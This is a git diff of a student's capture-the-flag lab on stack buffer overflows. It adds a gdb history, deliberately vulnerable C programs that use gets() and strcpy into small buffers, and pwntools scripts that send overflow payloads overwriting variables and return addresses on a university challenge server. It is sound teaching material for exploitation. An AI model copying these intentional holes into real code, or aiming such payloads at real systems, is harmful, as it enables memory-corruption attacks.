diff --git a/pa/lab6/.gdb_history b/pa/lab6/.gdb_history new file mode 100644 index 0000000..1397fad --- /dev/null +++ b/pa/lab6/.gdb_history @@ -0,0 +1,119 @@ +disas main +disas win +disas main +q +disas challenge +disas win +q +disas challenge +q +p /x &buffer +disas challenge +q +disas challenge +q +q +disas main +disas check_password +q +disas check_password +q +q +disas check_password +q +disas check_password +q +disassemble challenge +q +disas check_password +q +disas main +q +disas main +disas check_password +q +b main +r +b check_password +c +stack 50 +disas check_ +disas check_password +r +a +c +disas check_password +b 0x08048731 +b *0x08048731 +r +c +p /x $ebx +c +stack 50 +q +disas main +q +disas check_password +q +b *0x08048731 +r +si +stack 50 +q +b *0x08048731 +r +p $ebp +q +attach 103318 +b *0x08048731 +c +stack 50 +b *(0x804874d+5) +c +stack 50 +q +attach 104773 +disas check_ +disas check_password +b *0x08048738 +c +b * 0x8048752 +stack 30 +c +stack 30 +q +attach 106286 +disas check_password +b *0x08048735 +p *0x08048752 +b *0x08048752 +c +si +stack 50 +q +attach 107369 +b *0x08048735 +b *0x08048752 +c +si +stack 30 +c +si +stack 30 +c +q +attach 111389 +b *0x08048752 +b *0x08048735 +c +stack 30 +si +stack 30 +next +stack 20 +i +if +i f +stack +disas check_password +q diff --git a/pa/lab6/chall_calling_functions.py b/pa/lab6/chall_calling_functions.py new file mode 100644 index 0000000..1bf8a16 --- /dev/null +++ b/pa/lab6/chall_calling_functions.py @@ -0,0 +1,12 @@ +from pwn import * + +HOST = "mustard.stt.rnl.tecnico.ulisboa.pt" +PORT = 25153 + +WIN_ADDR = 0x080486f1 + +conn = remote(HOST, PORT) + +conn.recvuntil("?\n") +conn.send(b"\x55"*32 + b"\xf1\x86\x04\x08\n") +conn.interactive() diff --git a/pa/lab6/chall_match_an_exact_value.py b/pa/lab6/chall_match_an_exact_value.py new file mode 100644 index 0000000..fa4088e --- /dev/null +++ b/pa/lab6/chall_match_an_exact_value.py @@ -0,0 +1,10 @@ +from pwn import * + +HOST = "mustard.stt.rnl.tecnico.ulisboa.pt" +PORT = 25152 + +conn = remote(HOST, PORT) + +conn.recvuntil("?\n") +conn.send(b"\x55"*64 + b"dcba\n") +conn.interactive() diff --git a/pa/lab6/chall_return_address.py b/pa/lab6/chall_return_address.py new file mode 100644 index 0000000..ffbf47e --- /dev/null +++ b/pa/lab6/chall_return_address.py @@ -0,0 +1,12 @@ +from pwn import * + +HOST = "mustard.stt.rnl.tecnico.ulisboa.pt" +PORT = 25154 + +WIN_ADDR = 0x080486f1 + +conn = remote(HOST, PORT) + +conn.recvuntil("'\n") +conn.send(b"\x55"*0x12 + b"\xaa"*4 + b"\xf1\x86\x04\x08\n") +conn.interactive() diff --git a/pa/lab6/chall_simple_overflow.py b/pa/lab6/chall_simple_overflow.py new file mode 100644 index 0000000..cb99bd9 --- /dev/null +++ b/pa/lab6/chall_simple_overflow.py @@ -0,0 +1,10 @@ +from pwn import * + +HOST = "mustard.stt.rnl.tecnico.ulisboa.pt" +PORT = 25151 + +conn = remote(HOST, PORT) + +conn.recvuntil("0.\n") +conn.send(b"\x55"*128 + b"\x01\n") +conn.interactive() diff --git a/pa/lab6/chall_super_secure_system.py b/pa/lab6/chall_super_secure_system.py new file mode 100644 index 0000000..e987988 --- /dev/null +++ b/pa/lab6/chall_super_secure_system.py @@ -0,0 +1,15 @@ +from pwn import * + +HOST = "mustard.stt.rnl.tecnico.ulisboa.pt" +PORT = 25155 + +WIN_ADDR = p32(0x080487d9) +EBX = p32(0x804a001) # Has NULL byte +EBP = p32(0xffffcdd8) + +#conn = process("./check") +conn = remote(HOST, PORT) +pl = b"\x55"*0x24 + EBX + EBP + WIN_ADDR +input() +conn.send(pl) +conn.interactive() diff --git a/pa/lab6/check b/pa/lab6/check new file mode 100755 index 0000000..002c2eb Binary files /dev/null and b/pa/lab6/check differ diff --git a/pa/lab6/check.c b/pa/lab6/check.c new file mode 100644 index 0000000..969ebcb --- /dev/null +++ b/pa/lab6/check.c @@ -0,0 +1,30 @@ +#include +#include +#include +#include +#include "general.h" + +int check_password(char* password) { + char buffer[32]; + + strcpy(buffer, password); + + if(strcmp(buffer, getflag()) == 0) + return 1; + + return 0; +} + +int main() { + init(); + + char pass[64] = {0}; + // we know how to make this secure. No gets in here. + read(0, pass, 63); + + if(check_password(pass)){ + printf("Welcome back! Here is the secret flag that you already knew: %s\n", getflag()); + } else { + printf("Unauthorized user/passwd\n"); + } +} diff --git a/pa/lab6/functions b/pa/lab6/functions new file mode 100644 index 0000000..0ad9bfb Binary files /dev/null and b/pa/lab6/functions differ diff --git a/pa/lab6/functions.c b/pa/lab6/functions.c new file mode 100644 index 0000000..9603c36 --- /dev/null +++ b/pa/lab6/functions.c @@ -0,0 +1,27 @@ +#include +#include +#include +#include +#include "general.h" + +void win() { + printf("Congratulations, you win!!! You successfully changed the code flow\n"); + printf("Flag: %s\n", getflag()); +} + +int main() { + init(); + int (*fp)(); + char buffer[32]; + + fp = 0; + + printf("You win this game if you are able to call the function win. Can you do it?\n"); + + gets(buffer); + + if(fp) { + printf("Calling function pointer... jumping to %p\n", fp); + fp(); + } +} diff --git a/pa/lab6/match.c b/pa/lab6/match.c new file mode 100644 index 0000000..c81ef9f --- /dev/null +++ b/pa/lab6/match.c @@ -0,0 +1,24 @@ +#include +#include +#include +#include +#include +#include "general.h" + +int main() { + init(); + int test; + char buffer[64]; + + printf("You win this game if you can change variable test to the value 0x61626364. Have you noticed that the ascii code of 'a' is 0x61?\n"); + + test = 0; + gets(buffer); + + if (test == 0x61626364) { + printf("Congratulations, you win!!! You correctly got the variable to the right value\n"); + printf("Flag: %s\n", getflag()); + } else { + printf("Try again, you got 0x%08x, instead of 0x61626364\n", test); + } +} diff --git a/pa/lab6/return b/pa/lab6/return new file mode 100644 index 0000000..b6e2617 Binary files /dev/null and b/pa/lab6/return differ diff --git a/pa/lab6/return.c b/pa/lab6/return.c new file mode 100644 index 0000000..2297db0 --- /dev/null +++ b/pa/lab6/return.c @@ -0,0 +1,22 @@ +#include +#include +#include +#include +#include "general.h" + +void win() { + printf("Congratulations, you win!!! You successfully changed the code flow\n"); + printf("Flag, %s\n", getflag()); +} + +void challenge() { + char buffer[10]; + printf("You win this game if you are able to call the function win.'\n"); + gets(buffer); +} + +int main() { + init(); + challenge(); + return 0; +} diff --git a/pa/lab6/simple b/pa/lab6/simple new file mode 100755 index 0000000..99a5b92 Binary files /dev/null and b/pa/lab6/simple differ diff --git a/pa/lab6/simple.c b/pa/lab6/simple.c new file mode 100644 index 0000000..f3d81d4 --- /dev/null +++ b/pa/lab6/simple.c @@ -0,0 +1,23 @@ +#include +#include +#include +#include +#include "general.h" + +int main() { + init(); + int test; + char buffer[128]; + + printf("You win this game if you change variable test to a value different from 0.\n"); + + test = 0; + gets(buffer); + + if(test != 0) { + printf("YOU WIN!\n"); + printf("Flag: %s\n", getflag()); + } else { + printf("Try again...\n"); + } +}